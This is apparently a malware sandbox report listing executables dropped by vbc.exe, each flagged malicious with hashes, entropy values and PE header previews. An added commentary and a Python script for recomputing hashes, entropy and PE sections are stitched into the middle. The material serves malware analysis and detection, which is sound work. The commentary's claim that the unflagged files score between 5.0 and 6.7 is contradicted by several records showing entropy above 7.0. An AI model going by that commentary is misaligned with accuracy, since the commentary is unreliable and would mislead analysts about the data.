Preview: 2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-28 16:44:26-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-28 16:44:26-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-28 16:44:2

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1356800
Entropy (8bit): 5.347851035488352
Encrypted: false
SSDEEP: 24576:gQVTZu0JtsqjnhMgeiCl7G0nehbGZpbD:fVTZucDmg27RnWGj
MD5: 644513105C5FAA8D93951A3690E4014C
SHA1: CE87FC435B4B5D96F9092FB047E2A6F76DA6F265
SHA-256: 3D12C6189F0A759291474539A7F41498513F240C67F2BF514AD898981F8CD61A
SHA-512: 0009B398D379FC3ED0E7C445813F43ECEAF59E6487D0770AD1BE4F2E7A96829ADB326FE4C76DBD394523E2E314A90E9C952D73295EC556F803E6108460C79CA2
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1683968
Entropy (8bit): 5.623141229656673
Encrypted: false
SSDEEP: 24576:C+gkESfh4CoKsqjnhMgeiCl7G0nehbGZpbD:HgkE+SYDmg27RnWGj
MD5: C556C9415156168A9241A1485ABFCD1B
SHA1: 24EFA76A174A08EE7392BB1ADA1C1316844CEFF3
SHA-256: 5157F169BC744716E8E47C95919383894BD3CC1C4FDF080000B378ACE8EF8161
SHA-512: 385FBCFBF41D4836A52EB006A877962D08559FC30974B662725DE660E98783488B2B57FAF216595BACF1E94555546E10DD0CE60EC2A5A5E89E743B21E12B425B
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1532416
Entropy (8bit): 7.096669432275988
Encrypted: false
SSDEEP: 24576:dBpDRmi78gkPXlyo0GtjrVsqjnhMgeiCl7G0nehbGZpbD:XNRmi78gkPX4o0GtjNDmg27RnWGj
MD5: 148394E4EFBAB807A0FF714F17532C36
SHA1: 280681E9A5C1FBEDC59629950CE77BF362A11644
SHA-256: 7DDF905D18DF7DA9E313A2C6F72B34EE08D09F7C661F086B08C3212105E2DD28
SHA-512: 277AE985332AC84BF185D35BC41D7E28AA1E8B0AA04D1A22AD838CF66C3FC358B1488082BED716876AC12E003CF756E9830D2A7EDB802ADC324F4329792B8F28
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1282048
Entropy (8bit): 7.22907029371895
Encrypted: false
SSDEEP: 24576:MLOS2oTPIXVKsqjnhMgeiCl7G0nehbGZpbD:U/TlDmg27RnWGj
MD5: 064B8EDA98952251C0F55816C981877C
SHA1: C44E2E7D85D3A52D883D1C9A3CF69ABB27322347
SHA-256: DC0CDD928F3C6BAB25553544ABABE8B66D06EF2C856C164C7008662DD0B03C94
SHA-512: 920E10B730272E7BAD70DF70236CCE59D8346080BE3853FA2C4E2465F38C17CD80803DCAEB7EA6B0D637DBB73EF6D7A032061356886E83A1EDD6918285F59100
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1145344
Entropy (8bit): 5.031214663596253
Encrypted: false
SSDEEP: 12288:k1MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:k1MsqjnhMgeiCl7G0nehbGZpbD
MD5: 962F036055C8700601A80EB8D55F4D33
SHA1: 57D95363E945D5B4A25205D185BD0ED80674FE87
SHA-256: D31B10D4DEDEC81055FF085FF635D4B939061C6D7F813541F9DCB33976788765
SHA-512: AF10E62110189CBCB316C2D45C0C1AF2595A74F63B6E9E8ADCAA762C5836C1671BEFE1E3FDC06F90553F47050A4A013BFE175BC6E24E08E5EC1983281F72D3E8
Malicious: true
Reputation: unknown

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1222656
Entropy (8bit): 6.712053675041287
Encrypted: false
SSDEEP: 12288:tRudzvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tAdzvsqjnhMgeiCl7G0nehbGZpbD
MD5: B607159DB00D071ECD792434722F4680
SHA1: B75837359137A1170E37D859FAF03F03A9C41A63
SHA-256: AA3BAE970CF1F9DCA43BB455E8CB0546111F71C6BCADC2270B1CBDAF7CB5FF3B
SHA-512: 3E2AC8099BACE2274B42AB702A0E505483082CBFB71E9B919823F358A710921AD3635CF91DAD6F4989BA244E53C77F47E80D5D4BF4D173BDE7F5886D9C2C34EF
Malicious: true
Reputation: unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................=9.... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1457664
Entropy (8bit):5.082172819259051
Encrypted:false
SSDEEP:12288:0v7Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gsqjnhMgeiCl7G0nehbGZpbD
MD5:6C07308E316755EF2F904FAC94E072C4
SHA1:053E972835DD86264570523FD6A73D8CBAC0F4A7
SHA-256:F60D282EEE5BEC127BD2079CCC012D8F82257DB276B7F11A0CFAA5249F7DAD54
SHA-512:42E5617266506F221B93891C21E8A8D072ABD6B451086944A47B05DB5038549F6B40543DB408C83805B93816CB14612D498508753302B5F66D483E5D2D1CA1E0
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@....................................1/.... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1461248
Entropy (8bit):5.468634443928687
Encrypted:false
SSDEEP:24576:N5zhM1XSEusqjnhMgeiCl7G0nehbGZpbD:ZMsTDmg27RnWGj
MD5:63E3BB01C24D521F08D5DA84EA08A312
SHA1:F3EF14F40B2074601D15C058635E4D5CC86D3EAA
SHA-256:7101044AB67CD1DC8EFD7616AA3AA49BC6848135C3741271F2C0F98F971779F7
SHA-512:3D7148B2E6E405F8C8E1D46F38A1A51C7DEE9A49ECB842BB9844FE8B84E288DA7DFD6B045EC6859A55F9010B7986762485C95B4C64FD65BA9378A6E73C275036
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@....................................g..... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.499793724660495
Encrypted:false
SSDEEP:49152:WtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755xDmg27RN:WjEIa4HIEWOc53D527BWG
MD5:C1CFD6FCB6BC32F36B8A34D8455966F7
SHA1:CC643FF18B8AAD00C78BB8473BE6042595ECC53A
SHA-256:5EFF6FE37DCCF2F917CB29B02FF67456757AF22F7297EF4E5A7584505730739C
SHA-512:43732E9886F80EA8A6FDB51E72E6A563CF7066592572D045455196791A967627CC0857072A553DC64F0DE1262006AF889C0CE59C8FD71BC748870B8FD6AB76F0
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.99936732716747
Encrypted:true
SSDEEP:1572864:1Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:uXhwMhe6AABPiQwF6xQ22R
MD5:0F5D775032400655E05468EB739BFD85
SHA1:ACCCBE98C43C093DAD1C8606B310369C229D08C6
SHA-256:BC1BDE2CA96F84FF1FB9273C7E260F43A57889BC69476AB22150378CFF643376
SHA-512:144CFEDB84E02ADA102747A2C3858A1E0989D5B60AEA6731524B8D69FB8341959944872959C22F1AC3037F54FDB9B02174B3AB28A85F76CEC3A2F59805C8ABDE
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

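Of the dropped-file records in this section, the only one flagged Encrypted:true is the 59941376-byte drop directly above, whose 8-bit entropy (7.9994) sits at the 8.0 ceiling; the others score between 5.0 and 6.7 and are not flagged. Every Preview also shows the same skeleton: the MZ stub, then "PE..d" (the PE signature followed by the COFF Machine word 0x8664, whose low byte 0x64 prints as "d" and matches the "x86-64" File Type), then the section names .text, .rdata, .data, .pdata, .rsrc, .reloc and, in some files, .CRT, .didat and _RDATA. The Python below is added to this page as an illustration; it is not part of the Joe Sandbox report or of Joe Sandbox's tooling. It recomputes the fields these records carry (size, 8-bit Shannon entropy, an encrypted flag, MD5/SHA1/SHA-256/SHA-512) and walks the PE header to recover what the Preview column only hints at: machine type, PE32+ magic and per-section entropy, so a packed or encrypted section stands out even when the file-wide value is moderate. The 7.9 cutoff, the function names and the constructed sample PE32+ image are assumptions made for the example, not sandbox internals.

```python
"""Rebuild the per-file fields of a sandbox 'dropped files' record and walk the
PE header. Example code added to this page, not Joe Sandbox tooling."""
import hashlib
import math
import struct
from collections import Counter
from typing import Optional

# Buffers at or above this entropy are reported as encrypted/compressed. The
# 7.9 cutoff is an assumption for this example, not the sandbox's own rule.
ENTROPY_THRESHOLD = 7.9
IMAGE_FILE_MACHINE_AMD64 = 0x8664  # COFF Machine value shown as "x86-64"
PE32PLUS_MAGIC = 0x20B             # optional-header magic shown as "PE32+"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return max(0.0, -sum((c / n) * math.log2(c / n) for c in Counter(data).values()))


def digests(data: bytes) -> dict:
    """The digest set the report lists, upper-cased the way the report prints them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def pe_summary(data: bytes) -> Optional[dict]:
    """DOS header -> e_lfanew -> PE signature -> COFF header -> section table.
    Returns None for anything that is not a parseable PE image."""
    try:
        if len(data) < 0x40 or data[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
            return None
        # COFF header: Machine(2) NumberOfSections(2) TimeDateStamp(4)
        # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
        machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
        opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
        opt_off = e_lfanew + 24
        magic = struct.unpack_from("<H", data, opt_off)[0]
        sections = []
        for i in range(nsections):
            off = opt_off + opt_size + 40 * i  # section headers are 40 bytes each
            name = data[off:off + 8].rstrip(b"\x00").decode("ascii", "replace")
            raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)  # SizeOfRawData, PointerToRawData
            body = data[raw_ptr:raw_ptr + raw_size]
            # per-section entropy locates a packed/encrypted section inside an otherwise plain file
            sections.append({"name": name, "raw_size": raw_size, "entropy": shannon_entropy(body)})
    except struct.error:
        return None
    return {"x86_64": machine == IMAGE_FILE_MACHINE_AMD64,
            "pe32plus": magic == PE32PLUS_MAGIC, "sections": sections}


def describe(data: bytes) -> dict:
    """Rebuild one report record (plus the PE walk) from raw bytes."""
    ent = shannon_entropy(data)
    rec = {"Size (bytes)": len(data), "Entropy (8bit)": ent, "Encrypted": ent >= ENTROPY_THRESHOLD}
    rec.update(digests(data))
    rec["PE"] = pe_summary(data)
    return rec


def build_sample_pe(sections=((b".text", b"\x90" * 64), (b".rdata", bytes(range(256))))) -> bytes:
    """Constructed minimal PE32+ image for offline testing (not one of the dropped files):
    MZ stub, PE signature, AMD64 COFF header, PE32+ optional header, section table, raw data."""
    e_lfanew, opt_size = 0x80, 0xF0  # 0xF0 is the size of a PE32+ optional header
    dos = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", PE32PLUS_MAGIC).ljust(opt_size, b"\x00")
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)  # raw data starts after the headers
    table, bodies = b"", b""
    for name, body in sections:
        # Name(8) VirtualSize VirtualAddress SizeOfRawData PointerToRawData + 16 unused bytes
        table += name.ljust(8, b"\x00") + struct.pack("<IIII", len(body), raw_ptr, len(body), raw_ptr) + b"\x00" * 16
        bodies += body
        raw_ptr += len(body)
    return dos + b"PE\x00\x00" + coff + opt + table + bodies


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in describe(blob).items():
        print(f"{key}:{value}")
```

Run with a dropped file as the argument to compare the recomputed MD5/SHA-256 against the record and to see which sections carry the entropy; with no argument it walks the constructed sample. A whole-file value of 7.9994 over 60 MB means almost every byte is indistinguishable from random, which compression produces just as readily as encryption, so treat the Encrypted flag as a pointer to a payload worth unpacking rather than as a verdict on how it was protected.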
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1180160
Entropy (8bit):5.08482970497558
Encrypted:false
SSDEEP:12288:IWrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IesqjnhMgeiCl7G0nehbGZpbD
MD5:9E03958E27E1732026CBEED075960B24
SHA1:6B7760023F1B8743F4B325E03FF1B050FCE4C6A4
SHA-256:AD0A15B95700272D32A87212E3FA3C78A073C74AB6FE5719040AC10DCAE32827
SHA-512:276897A67D6F2A2B3CF15C2024A47F93781D682D767698F925BCCC82EA8D354DF445BBE631C3886FEE846FC21088253FA0A23574281C10090F3A16BCAAEBE893
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@......U..... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6210048
Entropy (8bit):6.386710599938762
Encrypted:false
SSDEEP:49152:+DvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXZ:fnN9KfxLk6GEQTX5UKzNDwD527BWG
MD5:1BE7872FF97C30030EDED9D2499D40B9
SHA1:95B7733967DF3979BBDF7B9696308B10E9F11CCE
SHA-256:655B660929AAA79A41B9BB9F49C6E1BF25A1CF82482244955B6A287AA2AC6A3B
SHA-512:D5408574811F99F3DD48171F9611028B95A570C4E35A24F505BAB5A2A7E61DF579370BCFF146ED38DEB2C62367F73D95E0FE3497A6F1A3328CAC5EE3DFE5A41B
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1157120
Entropy (8bit):5.04149745080951
Encrypted:false
SSDEEP:12288:emXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:emsqjnhMgeiCl7G0nehbGZpbD
MD5:548557C727CD0159FF5F05E3F749D478
SHA1:24C286B001748E225BE90A9351283365C9BF6B4D
SHA-256:9C3CDD2D7DCA17EB02D8487A962D8255D64C34AC67BEC19C6D1C7458329AE0EA
SHA-512:014C34F5DC85FCBD4DBD1C14BA0D1C78B8EE2C00BE1F61AA6151BC9691454CB5CEB0CF8F743B248398467D7EB79679B41626BF50F989A76E88CEB9BB6EE6B113
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):12039168
Entropy (8bit):6.596678752729291
Encrypted:false
SSDEEP:98304:7b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKhD527BWG:HnPgTHIwZoRBk9DdhSUEVIXgKhVQBWG
MD5:373B7B4556A367AAC3A716F31F4CE479
SHA1:382EA343DA126977A496A27B9CAF6270B4821EB5
SHA-256:234394D179326793214800F9A33A95C738738CF642D05EE049B483CF2DC8F26B
SHA-512:A3F87118D0D047D80F93955AAC383119731ADBB738165CE87D270D66C35158F52EFDB5A22D6F3F8FA3BE88781B73F80E77BF797B142D15062CFC5ADD5B5B78FC
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................Z.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1322496
Entropy (8bit):5.281833399741152
Encrypted:false
SSDEEP:24576:bg5FvCPusNsqjnhMgeiCl7G0nehbGZpbD:cftuDmg27RnWGj
MD5:B3CBED321222BC877A0E348542133421
SHA1:1A3B015F4E94C89B8D45E2A70340469082A5B0F2
SHA-256:5EA8C5C9AB319B322D982FD3CD0AE0E4ADB636C1B3FB8FD65F1D02C1084DB30F
SHA-512:C28CC1BEF3FC58650A64E3A4491B5110E47296904DD90DD86942A258D55DA4B34010090CF6019520B10B1700C550FFD4053DE0D6DADB547F96D066D94D6A0134
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1339904
Entropy (8bit):7.208906202543243
Encrypted:false
SSDEEP:24576:hjKTIsAjFuvtIfmFthMaT5U8aChaeunsqjnhMgeiCl7G0nehbGZpbD:hjIMmPh7TT79WDmg27RnWGj
MD5:13E30782CCE9F8772DD9C1B4AFEDD0DF
SHA1:6FB734E51429A4546ADE92C8ABBD566ADC0E59B1
SHA-256:6B393886CE964F461C832ED8CFFEDFD70128068D68FF8F9659AC0FE4AFDC8F49
SHA-512:A0D9436BA2A0EF22BCD4C6A2F4AB9DFC0F37A9C8917531A31413C88B97C69CC0F7F8B5B21374E6B3EED32AF67336FB15C86B1AE1D38244661447E21EFF4757B2
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1515520
Entropy (8bit):5.41180797664427
Encrypted:false
SSDEEP:24576:cGqVwCto1Gm5WgbsqjnhMgeiCl7G0nehbGZpbD:JZ1GmUgDmg27RnWGj
MD5:BAA97B20E3E571C9DCF5407A6C9DC331
SHA1:3C0D7A166C1FDB59A4D0941128EDF21FA0399700
SHA-256:426B5655338E5B66FDE7C94E22C3ECE7E80A41B841E589DF635ECB020023BE26
SHA-512:BCF0C628F8A3049D5ADDB366D03827F3204D4502E21EB3D965239261B29AAD288153B05D5557EC8EBE5C6FF444F3632310945798D04E8C665C3F813894B3DC12
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1253376
Entropy (8bit):5.157425664535493
Encrypted:false
SSDEEP:12288:qWBWHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qWBWHsqjnhMgeiCl7G0nehbGZpbD
MD5:A6E264A337B6BA85D755A97B42AF003E
SHA1:461E94F58F3139A56FE2EB68D24ECBB9F9CBFF0D
SHA-256:3F159BA91A53B6994ABEA847F1CFCA21CC5AFC97CFD24BBD622F961F68A9826F
SHA-512:C9FE6E59F6F37E61EBCC5EFF019AFA5F3DB7C5E1109E6E31914733A45DFCFA688A5C0D508E8598EA48CD3A7E6C3E79246EAEB17404A7B6A6943AFA835114D94B
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1683968
Entropy (8bit):7.228514679513595
Encrypted:false
SSDEEP:24576:if9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0wsqjnhMgeiCl7G0nehbGZpbD:i+GtCi27mVTyT+a0sDmg27RnWGj
MD5:7D6044BD92538DDC6B31B55D3CA009C5
SHA1:CD20085F8E5982B512BE7F90B70CA5A1FF796A6D
SHA-256:AA160A636DBE57A82FC13620508C511DBD339C1669FB3F3179D184C14F2CB1DD
SHA-512:CD69F63DA680EEBCE308940FEFC6E5F94629F6AEC14D05648512AA9E419ECBB58571AFD793212E0ECF68B92C8B427BBD91C8A17D47550DB10D1FA6D78F5A92B1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3110912
Entropy (8bit):6.649672264713212
Encrypted:false
SSDEEP:49152:yU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYXDmg27RnWGj:X2NfHOIK5Ns6qR91D527BWG
MD5:4D5FFB7A9FE23C33018CCA6810AF0561
SHA1:7589B87C5BAB7FD6B4B7F3039589AC6E5DD5D8D6
SHA-256:DB69EB475BEFA1A0AACDD0CA5F2FA3FA931808EEA26D7A7B16A85609737D8936
SHA-512:8D0B2165418451583EFC3CAE6512ED47026BFFEA94F8E1CF6DC26BE3C87F82F3FD39E06A9A1B0FFD2164814D8E2582D481C8571040820C78FE423E23F7347DA4
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1588224
Entropy (8bit):5.531940031316267
Encrypted:false
SSDEEP:24576:jkcWTUQcydLsqjnhMgeiCl7G0nehbGZpbD:jhKUEDmg27RnWGj
MD5:946FA159052E76E9E0CE72AFB76B6F7D
SHA1:DAEAACDD08A4CB24CA07B6037C05F4ECE5B8CD17
SHA-256:A553E8C8EDFEC9E53D5B61FFEB08517D62F8531622A61F6993D4522801E84A58
SHA-512:925AE16AE39C1C8FD584E83892FA948E743F94E9F29FD22EAAF67AA75C714927616A09BF80B13A1ADA4C99BDC964EB413139DD0DBF4D41E75A349317EA3E3017
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1338368
Entropy (8bit):5.352680785641225
Encrypted:false
SSDEEP:12288:AfY+FUBAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AA+qBAsqjnhMgeiCl7G0nehbGZpbD
MD5:DF1105E7A3F726CFB6C2BF8759A91988
SHA1:B02FAC63B7CE2D6BF8AA500B6995D60796978D0B
SHA-256:B03C393C668F4C5EF8EF9DBBC98CE1F283B07F23563EA988BD88FFD03E3C6A4F
SHA-512:46D43C13A3A4245F831D0F29685570F0F3974BB4C35EDCB01B8A91F4085C8562B8B96DB96942090BBF2A156C4CF35DBA2C610EEDE4BA0936092958E13F4929CF
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1143296
Entropy (8bit):5.022690346177126
Encrypted:false
SSDEEP:12288:EXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EsqjnhMgeiCl7G0nehbGZpbD
MD5:C018E1C19C4079A1D3984F7AD59E1979
